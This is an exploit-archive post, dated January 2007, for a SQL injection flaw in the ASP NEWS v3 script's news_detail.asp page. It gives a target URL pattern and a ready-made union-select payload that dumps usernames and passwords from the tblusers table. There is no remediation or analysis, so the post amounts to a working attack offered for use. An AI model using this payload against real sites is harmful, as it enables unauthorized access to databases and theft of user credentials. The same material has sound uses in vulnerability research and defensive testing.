Home / exploits aspnews3-sql.txt
Posted on 27 January 2007
******************************************************************************* # Title : ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # S.Page : http://www.planetgraphic.de/ ******************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]//news_detail.asp?id=[SQL] Example: //news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker!